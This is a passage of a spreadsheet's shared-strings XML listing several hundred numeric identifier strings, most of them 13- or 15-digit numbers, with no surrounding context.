  </si>
  <si>
    <t>9120107120876</t>
  </si>
  <si>
    <t>8120000951622</t>
  </si>
  <si>
    <t>8120002880333</t>
  </si>
  <si>
    <t>8120000992008</t>
  </si>
  <si>
    <t>8120003833308</t>
  </si>
  <si>
    <t>8120312031795</t>
  </si>
  <si>
    <t>9120309131906</t>
  </si>
  <si>
    <t>8120106851145</t>
  </si>
  <si>
    <t>8120114102467</t>
  </si>
  <si>
    <t>8120307870726</t>
  </si>
  <si>
    <t>9120106372302</t>
  </si>
  <si>
    <t>8120201820811</t>
  </si>
  <si>
    <t>8120108860612</t>
  </si>
  <si>
    <t>8120012261562</t>
  </si>
  <si>
    <t>8120001862128</t>
  </si>
  <si>
    <t>9120105420528</t>
  </si>
  <si>
    <t>8120009800997</t>
  </si>
  <si>
    <t>8120105891466</t>
  </si>
  <si>
    <t>9120207500082</t>
  </si>
  <si>
    <t>8120118050532</t>
  </si>
  <si>
    <t>8120101961291</t>
  </si>
  <si>
    <t>8120010030844</t>
  </si>
  <si>
    <t>8120017131157</t>
  </si>
  <si>
    <t>8120108871546</t>
  </si>
  <si>
    <t>8120109830812</t>
  </si>
  <si>
    <t>8120006900352</t>
  </si>
  <si>
    <t>8120312171951</t>
  </si>
  <si>
    <t>0220000562284</t>
  </si>
  <si>
    <t>8120001021697</t>
  </si>
  <si>
    <t>8120214051495</t>
  </si>
  <si>
    <t>9120001181189</t>
  </si>
  <si>
    <t>8120014151279</t>
  </si>
  <si>
    <t>8120006931042</t>
  </si>
  <si>
    <t>8120214010025</t>
  </si>
  <si>
    <t>8120115140663</t>
  </si>
  <si>
    <t>8120310140276</t>
  </si>
  <si>
    <t>8120003900213</t>
  </si>
  <si>
    <t>8120001820245</t>
  </si>
  <si>
    <t>8120313170429</t>
  </si>
  <si>
    <t>8120000870519</t>
  </si>
  <si>
    <t>8120218180923</t>
  </si>
  <si>
    <t>8120314011064</t>
  </si>
  <si>
    <t>8120118000139</t>
  </si>
  <si>
    <t>9120007190831</t>
  </si>
  <si>
    <t>9120006921696</t>
  </si>
  <si>
    <t>9120003183408</t>
  </si>
  <si>
    <t>1201000120292</t>
  </si>
  <si>
    <t>8120110091775</t>
  </si>
  <si>
    <t>8120210111723</t>
  </si>
  <si>
    <t>8120001702648</t>
  </si>
  <si>
    <t>8120105833403</t>
  </si>
  <si>
    <t>9120201140329</t>
  </si>
  <si>
    <t>8120015110227</t>
  </si>
  <si>
    <t>8120006890397</t>
  </si>
  <si>
    <t>8120212211307</t>
  </si>
  <si>
    <t>8120312242305</t>
  </si>
  <si>
    <t>8120215030627</t>
  </si>
  <si>
    <t>8120218071176</t>
  </si>
  <si>
    <t>8120119261776</t>
  </si>
  <si>
    <t>8120204931393</t>
  </si>
  <si>
    <t>8120112200778</t>
  </si>
  <si>
    <t>8120003840894</t>
  </si>
  <si>
    <t>8120007922978</t>
  </si>
  <si>
    <t>8120219170122</t>
  </si>
  <si>
    <t>8120015271228</t>
  </si>
  <si>
    <t>8120000891333</t>
  </si>
  <si>
    <t>8120003822374</t>
  </si>
  <si>
    <t>8120014032593</t>
  </si>
  <si>
    <t>8120101841565</t>
  </si>
  <si>
    <t>8120107910232</t>
  </si>
  <si>
    <t>8120011181279</t>
  </si>
  <si>
    <t>8120000891118</t>
  </si>
  <si>
    <t>8120311100056</t>
  </si>
  <si>
    <t>8120010270841</t>
  </si>
  <si>
    <t>8120211160919</t>
  </si>
  <si>
    <t>8120212231208</t>
  </si>
  <si>
    <t>8120003712405</t>
  </si>
  <si>
    <t>8120014021253</t>
  </si>
  <si>
    <t>8120212231493</t>
  </si>
  <si>
    <t>8120111260076</t>
  </si>
  <si>
    <t>8120312271421</t>
  </si>
  <si>
    <t>865439509804000</t>
  </si>
  <si>
    <t>8120116132733</t>
  </si>
  <si>
    <t>9120105251251</t>
  </si>
  <si>
    <t>9120105261432</t>
  </si>
  <si>
    <t>9120313070936</t>
  </si>
  <si>
    <t>8120014151382</t>
  </si>
  <si>
    <t>8120109830439</t>
  </si>
  <si>
    <t>8120217150963</t>
  </si>
  <si>
    <t>8120019040792</t>
  </si>
  <si>
    <t>8120206962906</t>
  </si>
  <si>
    <t>8120017242206</t>
  </si>
  <si>
    <t>8120014200983</t>
  </si>
  <si>
    <t>8120001880038</t>
  </si>
  <si>
    <t>8120112012544</t>
  </si>
  <si>
    <t>8120018002842</t>
  </si>
  <si>
    <t>8120200921439</t>
  </si>
  <si>
    <t>8120004920936</t>
  </si>
  <si>
    <t>9120305810976</t>
  </si>
  <si>
    <t>8120002772785</t>
  </si>
  <si>
    <t>8120101823407</t>
  </si>
  <si>
    <t>8120200802437</t>
  </si>
  <si>
    <t>8120101802538</t>
  </si>
  <si>
    <t>9120100882563</t>
  </si>
  <si>
    <t>8120013162091</t>
  </si>
  <si>
    <t>1248000201035</t>
  </si>
  <si>
    <t>022164701805000</t>
  </si>
  <si>
    <t>9120006132686</t>
  </si>
  <si>
    <t>8120118031406</t>
  </si>
  <si>
    <t>8120211222064</t>
  </si>
  <si>
    <t>8120005861765</t>
  </si>
  <si>
    <t>9120003121433</t>
  </si>
  <si>
    <t>9120100760951</t>
  </si>
  <si>
    <t>9120105143014</t>
  </si>
  <si>
    <t>8120210022746</t>
  </si>
  <si>
    <t>9120106180141</t>
  </si>
  <si>
    <t>8120001850294</t>
  </si>
  <si>
    <t>1261000472538</t>
  </si>
  <si>
    <t>8120004872553</t>
  </si>
  <si>
    <t>8120119221421</t>
  </si>
  <si>
    <t>9120203261115</t>
  </si>
  <si>
    <t>8120003850772</t>
  </si>
  <si>
    <t>8120001971153</t>
  </si>
  <si>
    <t>9120301103004</t>
  </si>
  <si>
    <t>9120102160188</t>
  </si>
  <si>
    <t>9120109200282</t>
  </si>
  <si>
    <t>8120007762971</t>
  </si>
  <si>
    <t>8120100852783</t>
  </si>
  <si>
    <t>8120113251993</t>
  </si>
  <si>
    <t>8120110242389</t>
  </si>
  <si>
    <t>9120005270692</t>
  </si>
  <si>
    <t>8120208912576</t>
  </si>
  <si>
    <t>9120302102254</t>
  </si>
  <si>
    <t>9120008200118</t>
  </si>
  <si>
    <t>9120406251018</t>
  </si>
  <si>
    <t>9120207370811</t>
  </si>
  <si>
    <t>0258010140016</t>
  </si>
  <si>
    <t>8120001970582</t>
  </si>
  <si>
    <t>9120203261734</t>
  </si>
  <si>
    <t>9120005172241</t>
  </si>
  <si>
    <t>8120013131862</t>
  </si>
  <si>
    <t>8120003752084</t>
  </si>
  <si>
    <t>8120008892019</t>
  </si>
  <si>
    <t>9120108170039</t>
  </si>
  <si>
    <t>8120105811004</t>
  </si>
  <si>
    <t>8120003971653</t>
  </si>
  <si>
    <t>9120001820437</t>
  </si>
  <si>
    <t>8120001902055</t>
  </si>
  <si>
    <t>8120014043007</t>
  </si>
  <si>
    <t>8120116262085</t>
  </si>
  <si>
    <t>8120006772701</t>
  </si>
  <si>
    <t>8120114231371</t>
  </si>
  <si>
    <t>8120009712865</t>
  </si>
  <si>
    <t>0220406812856</t>
  </si>
  <si>
    <t>8120312172015</t>
  </si>
  <si>
    <t>9120304230146</t>
  </si>
  <si>
    <t>9120101121678</t>
  </si>
  <si>
    <t>9120404311439</t>
  </si>
  <si>
    <t>9120100202183</t>
  </si>
  <si>
    <t>9120006202932</t>
  </si>
  <si>
    <t>312389</t>
  </si>
  <si>
    <t>9120008382598</t>
  </si>
  <si>
    <t>9120108823803</t>
  </si>
  <si>
    <t>9120402321631</t>
  </si>
  <si>
    <t>8120006722905</t>
  </si>
  <si>
    <t>8120116133701</t>
  </si>
  <si>
    <t>8120210171055</t>
  </si>
  <si>
    <t>9120107311428</t>
  </si>
  <si>
    <t>9120006102198</t>
  </si>
  <si>
    <t>8120109752973</t>
  </si>
  <si>
    <t>9120307312773</t>
  </si>
  <si>
    <t>9120301612869</t>
  </si>
  <si>
    <t>8120416121249</t>
  </si>
  <si>
    <t>9120100181718</t>
  </si>
  <si>
    <t>8120118261832</t>
  </si>
  <si>
    <t>8120001970694</t>
  </si>
  <si>
    <t>8120017150913</t>
  </si>
  <si>
    <t>8120109801641</t>
  </si>
  <si>
    <t>8120001761861</t>
  </si>
  <si>
    <t>8120001971344</t>
  </si>
  <si>
    <t>9120300200969</t>
  </si>
  <si>
    <t>8120301800617</t>
  </si>
  <si>
    <t>9120402290546</t>
  </si>
  <si>
    <t>8120319012252</t>
  </si>
  <si>
    <t>9120205352493</t>
  </si>
  <si>
    <t>8120116162975</t>
  </si>
  <si>
    <t>9120207132759</t>
  </si>
  <si>
    <t>9120019130126</t>
  </si>
  <si>
    <t>9120110152379</t>
  </si>
  <si>
    <t>9120107200414</t>
  </si>
  <si>
    <t>8120013290666</t>
  </si>
  <si>
    <t>9120108441819</t>
  </si>
  <si>
    <t>8120108990436</t>
  </si>
  <si>
    <t>8120116130922</t>
  </si>
  <si>
    <t>9120211102815</t>
  </si>
  <si>
    <t>8120003902608</t>
  </si>
  <si>
    <t>8120219191046</t>
  </si>
  <si>
    <t>9120001272067</t>
  </si>
  <si>
    <t>8120119053301</t>
  </si>
  <si>
    <t>9120204252581</t>
  </si>
  <si>
    <t>9120018101595</t>
  </si>
  <si>
    <t>9120208461506</t>
  </si>
  <si>
    <t>9120307232559</t>
  </si>
  <si>
    <t>8120105702565</t>
  </si>
  <si>
    <t>1292000441358</t>
  </si>
  <si>
    <t>8120008991245</t>
  </si>
  <si>
    <t>8120205921472</t>
  </si>
  <si>
    <t>9120108480688</t>
  </si>
  <si>
    <t>316685486655000</t>
  </si>
  <si>
    <t>9120304172131</t>
  </si>
  <si>
    <t>9120405201923</t>
  </si>
  <si>
    <t>1275001451363</t>
  </si>
  <si>
    <t>8120315120371</t>
  </si>
  <si>
    <t>9120007522659</t>
  </si>
  <si>
    <t>9120303490181</t>
  </si>
  <si>
    <t>9120105291536</t>
  </si>
  <si>
    <t>8120118251535</t>
  </si>
  <si>
    <t>8120214270364</t>
  </si>
  <si>
    <t>9120202111174</t>
  </si>
  <si>
    <t>8120118051996</t>
  </si>
  <si>
    <t>8120009991788</t>
  </si>
  <si>
    <t>9120600832223</t>
  </si>
  <si>
    <t>9120202520281</t>
  </si>
  <si>
    <t>8120002762174</t>
  </si>
  <si>
    <t>9120200131714</t>
  </si>
  <si>
    <t>8120117231894</t>
  </si>
  <si>
    <t>8120102982914</t>
  </si>
  <si>
    <t>8120109832893</t>
  </si>
  <si>
    <t>8120015010259</t>
  </si>
  <si>
    <t>9120009782425</t>
  </si>
  <si>
    <t>9120204200489</t>
  </si>
  <si>
    <t>9120218152675</t>
  </si>
  <si>
    <t>9120005461005</t>
  </si>
  <si>
    <t>9120206132554</t>
  </si>
  <si>
    <t>8120000701137</t>
  </si>
  <si>
    <t>8120005703115</t>
  </si>
  <si>
    <t>8120111132197</t>
  </si>
  <si>
    <t>9120001513414</t>
  </si>
  <si>
    <t>9120206810471</t>
  </si>
  <si>
    <t>9120201771764</t>
  </si>
  <si>
    <t>9120309731916</t>
  </si>
  <si>
    <t>8120212121557</t>
  </si>
  <si>
    <t>9120305811652</t>
  </si>
  <si>
    <t>9120207342382</t>
  </si>
  <si>
    <t>9120009381857</t>
  </si>
  <si>
    <t>9120008592175</t>
  </si>
  <si>
    <t>9120106450286</t>
  </si>
  <si>
    <t>9120601733213</t>
  </si>
  <si>
    <t>9120001611975</t>
  </si>
  <si>
    <t>9120000912699</t>
  </si>
  <si>
    <t>9120308441902</t>
  </si>
  <si>
    <t>8120007901038</t>
  </si>
  <si>
    <t>9120101622563</t>
  </si>
  <si>
    <t>9120301921725</t>
  </si>
  <si>
    <t>9120203920049</t>
  </si>
  <si>
    <t>1245000101494</t>
  </si>
  <si>
    <t>9120101512381</t>
  </si>
  <si>
    <t>9120000681884</t>
  </si>
  <si>
    <t>8120109832577</t>
  </si>
  <si>
    <t>8120312051279</t>
  </si>
  <si>
    <t>0220002122645</t>
  </si>
  <si>
    <t>8120114241089</t>
  </si>
  <si>
    <t>9120108511501</t>
  </si>
  <si>
    <t>9120004612586</t>
  </si>
  <si>
    <t>8120312073116</t>
  </si>
  <si>
    <t>9120409232766</t>
  </si>
  <si>
    <t>9120202141219</t>
  </si>
  <si>
    <t>9120104120535</t>
  </si>
  <si>
    <t>8120002742883</t>
  </si>
  <si>
    <t>9120019280845</t>
  </si>
  <si>
    <t>9120206532435</t>
  </si>
  <si>
    <t>9120002612235</t>
  </si>
  <si>
    <t>8120119262709</t>
  </si>
  <si>
    <t>8120008881467</t>
  </si>
  <si>
    <t>8120012231175</t>
  </si>
  <si>
    <t>149951428331000</t>
  </si>
  <si>
    <t>9120215051115</t>
  </si>
  <si>
    <t>9120005192752</t>
  </si>
  <si>
    <t>8120108872277</t>
  </si>
  <si>
    <t>0206000902635</t>
  </si>
  <si>
    <t>8120201920871</t>
  </si>
  <si>
    <t>812101962165</t>
  </si>
  <si>
    <t>0205000991418</t>
  </si>
  <si>
    <t>8120005920342</t>
  </si>
  <si>
    <t>9120207252371</t>
  </si>
  <si>
    <t>9120216053603</t>
  </si>
  <si>
    <t>9120201913308</t>
  </si>
  <si>
    <t>9120311081442</t>
  </si>
  <si>
    <t>9120209861561</t>
  </si>
  <si>
    <t>93056338791500</t>
  </si>
  <si>
    <t>9120017090943</t>
  </si>
  <si>
    <t>9120208933005</t>
  </si>
  <si>
    <t>8120018201843</t>
  </si>
  <si>
    <t>8120011221259</t>
  </si>
  <si>
    <t>8120006872691</t>
  </si>
  <si>
    <t>9120007891005</t>
  </si>
  <si>
    <t>9120401742356</t>
  </si>
  <si>
    <t>9120201772324</t>
  </si>
  <si>
    <t>8120001851172</t>
  </si>
  <si>
    <t>8120115211908</t>
  </si>
  <si>
    <t>9120018161041</t>
  </si>
  <si>
    <t>9120204172152</t>
  </si>
  <si>
    <t>8120012090268</t>
  </si>
  <si>
    <t>9120201942075</t>
  </si>
  <si>
    <t>8120001812472</t>
  </si>
  <si>
    <t>8120312201625</t>
  </si>
  <si>
    <t>8120003902362</t>
  </si>
  <si>
    <t>9120303832877</t>
  </si>
  <si>
    <t>9120005700293</t>
  </si>
  <si>
    <t>8120100942851</t>
  </si>
  <si>
    <t>9120417060595</t>
  </si>
  <si>
    <t>0296010150866</t>
  </si>
  <si>
    <t>8120214073117</t>
  </si>
  <si>
    <t>2551554</t>
  </si>
  <si>
    <t>8120210190089</t>
  </si>
  <si>
    <t>9120013020893</t>
  </si>
  <si>
    <t>9120504853106</t>
  </si>
  <si>
    <t>8120216272563</t>
  </si>
  <si>
    <t>8120016141574</t>
  </si>
  <si>
    <t>9120303941621</t>
  </si>
  <si>
    <t>9120314240951</t>
  </si>
  <si>
    <t>9120300410197</t>
  </si>
  <si>
    <t>9120213072421</t>
  </si>
  <si>
    <t>078834495602000</t>
  </si>
  <si>
    <t>9120014200668</t>
  </si>
  <si>
    <t>9120009571443</t>
  </si>
  <si>
    <t>919768739823000</t>
  </si>
  <si>
    <t>9120016291021</t>
  </si>
  <si>
    <t>9120202342013</t>
  </si>
  <si>
    <t>8120114003603</t>
  </si>
  <si>
    <t>9120508753203</t>
  </si>
  <si>
    <t>8120118030181</t>
  </si>
  <si>
    <t>9120108991539</t>
  </si>
  <si>
    <t>9120100840125</t>
  </si>
  <si>
    <t>8120003851916</t>
  </si>
  <si>
    <t>8120206860214</t>
  </si>
  <si>
    <t>8120005811069</t>
  </si>
  <si>
    <t>8120004860535</t>
  </si>
  <si>
    <t>8120103840915</t>
  </si>
  <si>
    <t>8120001721627</t>
  </si>
  <si>
    <t>8120000791319</t>
  </si>
  <si>
    <t>9120114212033</t>
  </si>
  <si>
    <t>9120117083812</t>
  </si>
  <si>
    <t>9120202842435</t>
  </si>
  <si>
    <t>8120012260346</t>
  </si>
  <si>
    <t>8120014122233</t>
  </si>
  <si>
    <t>8120111020744</t>
  </si>
  <si>
    <t>8120311071686</t>
  </si>
  <si>
    <t>9120201142256</t>
  </si>
  <si>
    <t>9120102522631</t>
  </si>
  <si>
    <t>9120412271603</t>
  </si>
  <si>
    <t>9120106762024</t>
  </si>
  <si>
    <t>8120119281993</t>
  </si>
  <si>
    <t>9120003540563</t>
  </si>
  <si>
    <t>8120005860639</t>
  </si>
  <si>
    <t>8120016132495</t>
  </si>
  <si>
    <t>9120208242369</t>
  </si>
  <si>
    <t>9120214290551</t>
  </si>
  <si>
    <t>8120305890614</t>
  </si>
  <si>
    <t>9120302642919</t>
  </si>
  <si>
    <t>9120408362861</t>
  </si>
  <si>
    <t>8120108732349</t>
  </si>
  <si>
    <t>8120309830713</t>
  </si>
  <si>
    <t>9120005982557</t>
  </si>
  <si>
    <t>9120213192075</t>
  </si>
  <si>
    <t>9120303332802</t>
  </si>
  <si>
    <t>9120003950366</t>
  </si>
  <si>
    <t>8120213162973</t>
  </si>
  <si>
    <t>8120106880689</t>
  </si>
  <si>
    <t>0220003101452</t>
  </si>
  <si>
    <t>0220105111254</t>
  </si>
  <si>
    <t>8120215142622</t>
  </si>
  <si>
    <t>8120215041982</t>
  </si>
  <si>
    <t>8120009793819</t>
  </si>
  <si>
    <t>0220208772639</t>
  </si>
  <si>
    <t>8120002960163</t>
  </si>
  <si>
    <t>0220000170128</t>
  </si>
  <si>
    <t>919950790953000</t>
  </si>
  <si>
    <t>8120000802571</t>
  </si>
  <si>
    <t>8120219001563</t>
  </si>
  <si>
    <t>736590936041000</t>
  </si>
  <si>
    <t>8120000811308</t>
  </si>
  <si>
    <t>9120000370447</t>
  </si>
  <si>
    <t>0220001152478</t>
  </si>
  <si>
    <t>8120001820471</t>
  </si>
  <si>
    <t>0220103302579</t>
  </si>
  <si>
    <t>9120103312651</t>
  </si>
  <si>
    <t>8120015100195</t>
  </si>
  <si>
    <t>8120108970759</t>
  </si>
  <si>
    <t>028174423613000</t>
  </si>
  <si>
    <t>0220106192178</t>
  </si>
  <si>
    <t>8120117142836</t>
  </si>
  <si>
    <t>9120019101631</t>
  </si>
  <si>
    <t>8120004810337</t>
  </si>
  <si>
    <t>9120602741711</t>
  </si>
  <si>
    <t>8120013231117</t>
  </si>
  <si>
    <t>9120100572592</t>
  </si>
  <si>
    <t>797099041721000</t>
  </si>
  <si>
    <t>083286385722002</t>
  </si>
  <si>
    <t>012252029123000</t>
  </si>
  <si>
    <t>8120117052432</t>
  </si>
  <si>
    <t>9120003782171</t>
  </si>
  <si>
    <t>8120001731663</t>
  </si>
  <si>
    <t>0220008102021</t>
  </si>
  <si>
    <t>0220205652157</t>
  </si>
  <si>
    <t>9120508880079</t>
  </si>
  <si>
    <t>8120002982202</t>
  </si>
  <si>
    <t>8120205991786</t>
  </si>
  <si>
    <t>9120103450529</t>
  </si>
  <si>
    <t>0220102100484</t>
  </si>
  <si>
    <t>0220209112591</t>
  </si>
  <si>
    <t>9120306842306</t>
  </si>
  <si>
    <t>9120204811139</t>
  </si>
  <si>
    <t>8120315042249</t>
  </si>
  <si>
    <t>9120213011276</t>
  </si>
  <si>
    <t>9120413012641</t>
  </si>
  <si>
    <t>9120302252407</t>
  </si>
  <si>
    <t>0220200280766</t>
  </si>
  <si>
    <t>941821225801000</t>
  </si>
  <si>
    <t>0220004240356</t>
  </si>
  <si>
    <t>9120003240896</t>
  </si>
  <si>
    <t>8120104871553</t>
  </si>
  <si>
    <t>9120006361253</t>
  </si>
  <si>
    <t>8120101833713</t>
  </si>
  <si>
    <t>8120009802176</t>
  </si>
  <si>
    <t>9120007552991</t>
  </si>
  <si>
    <t>0220209261811</t>
  </si>
  <si>
    <t>9120003441629</t>
  </si>
  <si>
    <t>9120403931597</t>
  </si>
  <si>
    <t>9120003491309</t>
  </si>
  <si>
    <t>9120000183203</t>
  </si>
  <si>
    <t>745985622647000</t>
  </si>
  <si>
    <t>9120311122098</t>
  </si>
  <si>
    <t>0220001140868</t>
  </si>
  <si>
    <t>8120218140026</t>
  </si>
  <si>
    <t>9120213150563</t>
  </si>
  <si>
    <t>9120203120096</t>
  </si>
  <si>
    <t>9120302212381</t>
  </si>
  <si>
    <t>830449955047000</t>
  </si>
  <si>
    <t>9120318051371</t>
  </si>
  <si>
    <t>8120316091166</t>
  </si>
  <si>
    <t>9120105470987</t>
  </si>
  <si>
    <t>9120006761426</t>
  </si>
  <si>
    <t>9120102261326</t>
  </si>
  <si>
    <t>8120000802806</t>
  </si>
  <si>
    <t>817642622503000</t>
  </si>
  <si>
    <t>9120015021409</t>
  </si>
  <si>
    <t>0220004251549</t>
  </si>
  <si>
    <t>9120108382555</t>
  </si>
  <si>
    <t>9120104400694</t>
  </si>
  <si>
    <t>9120109601774</t>
  </si>
  <si>
    <t>9120204981963</t>
  </si>
  <si>
    <t>8120002781897</t>
  </si>
  <si>
    <t>9120001131226</t>
  </si>
  <si>
    <t>0220102110979</t>
  </si>
  <si>
    <t>9120107261816</t>
  </si>
  <si>
    <t>9120112051346</t>
  </si>
  <si>
    <t>8120014110779</t>
  </si>
  <si>
    <t>9120008152749</t>
  </si>
  <si>
    <t>0220008251974</t>
  </si>
  <si>
    <t>0220108162447</t>
  </si>
  <si>
    <t>804624906451000</t>
  </si>
  <si>
    <t>8120112041423</t>
  </si>
  <si>
    <t>8120013241583</t>
  </si>
  <si>
    <t>9120006272829</t>
  </si>
  <si>
    <t>9120103222223</t>
  </si>
  <si>
    <t>766654818801000</t>
  </si>
  <si>
    <t>9120008852896</t>
  </si>
  <si>
    <t>0220000242986</t>
  </si>
  <si>
    <t>8120201822894</t>
  </si>
  <si>
    <t>8120216232318</t>
  </si>
  <si>
    <t>8120001950519</t>
  </si>
  <si>
    <t>1287000530339</t>
  </si>
  <si>
    <t>8120008981626</t>
  </si>
  <si>
    <t>9120008530512</t>
  </si>
  <si>
    <t>9120305392353</t>
  </si>
  <si>
    <t>9120009390846</t>
  </si>
  <si>
    <t>8120016261803</t>
  </si>
  <si>
    <t>9120009422265</t>
  </si>
  <si>
    <t>8120108972109</t>
  </si>
  <si>
    <t>9120205152985</t>
  </si>
  <si>
    <t>0220207340748</t>
  </si>
  <si>
    <t>9120017240543</t>
  </si>
  <si>
    <t>0220109241806</t>
  </si>
  <si>
    <t>8120217052736</t>
  </si>
  <si>
    <t>9120117290834</t>
  </si>
  <si>
    <t>8120018201426</t>
  </si>
  <si>
    <t>9120201550068</t>
  </si>
  <si>
    <t>0220001341875</t>
  </si>
  <si>
    <t>8120002831305</t>
  </si>
  <si>
    <t>0220109280359</t>
  </si>
  <si>
    <t>8120003840093</t>
  </si>
  <si>
    <t>9120307960749</t>
  </si>
  <si>
    <t>9120201220069</t>
  </si>
  <si>
    <t>8120008860172</t>
  </si>
  <si>
    <t>9120204882276</t>
  </si>
  <si>
    <t>9120004541058</t>
  </si>
  <si>
    <t>8120100821448</t>
  </si>
  <si>
    <t>9120602861837</t>
  </si>
  <si>
    <t>0220103370656</t>
  </si>
  <si>
    <t>0220008100493</t>
  </si>
  <si>
    <t>8120218013712</t>
  </si>
  <si>
    <t>8120008931009</t>
  </si>
  <si>
    <t>8120001772714</t>
  </si>
  <si>
    <t>8120000831549</t>
  </si>
  <si>
    <t>9120013121546</t>
  </si>
  <si>
    <t>9120105860799</t>
  </si>
  <si>
    <t>9120103173307</t>
  </si>
  <si>
    <t>9120212040038</t>
  </si>
  <si>
    <t>8120108812181</t>
  </si>
  <si>
    <t>0220000362458</t>
  </si>
  <si>
    <t>9120308312379</t>
  </si>
  <si>
    <t>9120408921502</t>
  </si>
  <si>
    <t>0220103892682</t>
  </si>
  <si>
    <t>9120404750529</t>
  </si>
  <si>
    <t>9120209131141</t>
  </si>
  <si>
    <t>9120301230367</t>
  </si>
  <si>
    <t>9120114200928</t>
  </si>
  <si>
    <t>8120110003808</t>
  </si>
  <si>
    <t>9120304682174</t>
  </si>
  <si>
    <t>8120108801243</t>
  </si>
  <si>
    <t>8120005833413</t>
  </si>
  <si>
    <t>8120310102417</t>
  </si>
  <si>
    <t>0220205330056</t>
  </si>
  <si>
    <t>9120004400928</t>
  </si>
  <si>
    <t>9120202172782</t>
  </si>
  <si>
    <t>9120502971026</t>
  </si>
  <si>
    <t>8120217010921</t>
  </si>
  <si>
    <t>8120311291128</t>
  </si>
  <si>
    <t>9120205212067</t>
  </si>
  <si>
    <t>8120018162118</t>
  </si>
  <si>
    <t>8120115013908</t>
  </si>
  <si>
    <t>0220000301607</t>
  </si>
  <si>
    <t>945996395036000</t>
  </si>
  <si>
    <t>9120310131255</t>
  </si>
  <si>
    <t>9120002580915</t>
  </si>
  <si>
    <t>9120000212056</t>
  </si>
  <si>
    <t>9120010110054</t>
  </si>
  <si>
    <t>0220107231847</t>
  </si>
  <si>
    <t>943561845951000</t>
  </si>
  <si>
    <t>0220201102644</t>
  </si>
  <si>
    <t>8120115070542</t>
  </si>
  <si>
    <t>014474126627000</t>
  </si>
  <si>
    <t>8120216182181</t>
  </si>
  <si>
    <t>8120105811555</t>
  </si>
  <si>
    <t>0220302380243</t>
  </si>
  <si>
    <t>9120103202307</t>
  </si>
  <si>
    <t>0220000100817</t>
  </si>
  <si>
    <t>8120204793715</t>
  </si>
  <si>
    <t>0220103331008</t>
  </si>
  <si>
    <t>9120115122269</t>
  </si>
  <si>
    <t>9120219012454</t>
  </si>
  <si>
    <t>8120311151257</t>
  </si>
  <si>
    <t>8120219252902</t>
  </si>
  <si>
    <t>9120018172765</t>
  </si>
  <si>
    <t>9120219141494</t>
  </si>
  <si>
    <t>9120205721752</t>
  </si>
  <si>
    <t>0220007462584</t>
  </si>
  <si>
    <t>8120200921691</t>
  </si>
  <si>
    <t xml:space="preserve"> 9120007721943</t>
  </si>
  <si>
    <t>8120200982643</t>
  </si>
  <si>
    <t>8120100982956</t>
  </si>
  <si>
    <t>8120017221293</t>
  </si>
  <si>
    <t>0220105463303</t>
  </si>
  <si>
    <t>8120208752455</t>
  </si>
  <si>
    <t>0220200260031</t>
  </si>
  <si>
    <t>8120002821618</t>
  </si>
  <si>
    <t>0220000572024</t>
  </si>
  <si>
    <t>9120002900753</t>
  </si>
  <si>
    <t>8120001801049</t>
  </si>
  <si>
    <t>0220001552903</t>
  </si>
  <si>
    <t>9120208431209</t>
  </si>
  <si>
    <t>0264010152409</t>
  </si>
  <si>
    <t>8120012010324</t>
  </si>
  <si>
    <t>9120205241655</t>
  </si>
  <si>
    <t>8120013021406</t>
  </si>
  <si>
    <t>9120011043716</t>
  </si>
  <si>
    <t>9120405940825</t>
  </si>
  <si>
    <t>8120102902081</t>
  </si>
  <si>
    <t>030849491033000</t>
  </si>
  <si>
    <t>8120202860998</t>
  </si>
  <si>
    <t>8120004801168</t>
  </si>
  <si>
    <t>8120105891306</t>
  </si>
  <si>
    <t>8120105950451</t>
  </si>
  <si>
    <t>9120005930932</t>
  </si>
  <si>
    <t>316280775922000</t>
  </si>
  <si>
    <t>8120003801742</t>
  </si>
  <si>
    <t>8120119222762</t>
  </si>
  <si>
    <t>0220002640856</t>
  </si>
  <si>
    <t>855549556643000</t>
  </si>
  <si>
    <t>0220109451473</t>
  </si>
  <si>
    <t>0220001601253</t>
  </si>
  <si>
    <t>8120006900273</t>
  </si>
  <si>
    <t>0220104621768</t>
  </si>
  <si>
    <t>8120102801461</t>
  </si>
  <si>
    <t>0220104622534</t>
  </si>
  <si>
    <t>9120308122931</t>
  </si>
  <si>
    <t>9120102211354</t>
  </si>
  <si>
    <t>0220002242595</t>
  </si>
  <si>
    <t>0220005602359</t>
  </si>
  <si>
    <t>9120204231517</t>
  </si>
  <si>
    <t>9120304772692</t>
  </si>
  <si>
    <t>8120017021605</t>
  </si>
  <si>
    <t>9120207222963</t>
  </si>
  <si>
    <t>9120313072117</t>
  </si>
  <si>
    <t>0220102502086</t>
  </si>
  <si>
    <t>343304788121000</t>
  </si>
  <si>
    <t>0220106131459</t>
  </si>
  <si>
    <t>0220104612094</t>
  </si>
  <si>
    <t>8120010130156</t>
  </si>
  <si>
    <t>0220301691484</t>
  </si>
  <si>
    <t>8120006722804</t>
  </si>
  <si>
    <t>0220208671185</t>
  </si>
  <si>
    <t>8120203970979</t>
  </si>
  <si>
    <t>9120212291594</t>
  </si>
  <si>
    <t>0220107670643</t>
  </si>
  <si>
    <t>8120202880293</t>
  </si>
  <si>
    <t>9120200331356</t>
  </si>
  <si>
    <t>8120004873214</t>
  </si>
  <si>
    <t>8120100702435</t>
  </si>
  <si>
    <t>0220008790931</t>
  </si>
  <si>
    <t>9120503701683</t>
  </si>
  <si>
    <t>8120105970633</t>
  </si>
  <si>
    <t>9120218022623</t>
  </si>
  <si>
    <t>8120217002652</t>
  </si>
  <si>
    <t>8120100912045</t>
  </si>
  <si>
    <t>9120102153607</t>
  </si>
  <si>
    <t>8120100850114</t>
  </si>
  <si>
    <t>9120001450741</t>
  </si>
  <si>
    <t>945768315068000</t>
  </si>
  <si>
    <t>8120310150762</t>
  </si>
  <si>
    <t>8120017271423</t>
  </si>
  <si>
    <t>9120008172413</t>
  </si>
  <si>
    <t>0220009632945</t>
  </si>
  <si>
    <t>0220101640946</t>
  </si>
  <si>
    <t>8120101902214</t>
  </si>
  <si>
    <t>8120212290061</t>
  </si>
  <si>
    <t>9120103980464</t>
  </si>
  <si>
    <t>8120114202661</t>
  </si>
  <si>
    <t>9120101751083</t>
  </si>
  <si>
    <t>710039173721000</t>
  </si>
  <si>
    <t>8120000851913</t>
  </si>
  <si>
    <t>9120106250782</t>
  </si>
  <si>
    <t>0220108471171</t>
  </si>
  <si>
    <t>9120602172119</t>
  </si>
  <si>
    <t>030475982805001</t>
  </si>
  <si>
    <t>0220002162627</t>
  </si>
  <si>
    <t>081825986215000</t>
  </si>
  <si>
    <t>0220302631084</t>
  </si>
  <si>
    <t>9120310120148</t>
  </si>
  <si>
    <t>9120103412123</t>
  </si>
  <si>
    <t>0220004430653</t>
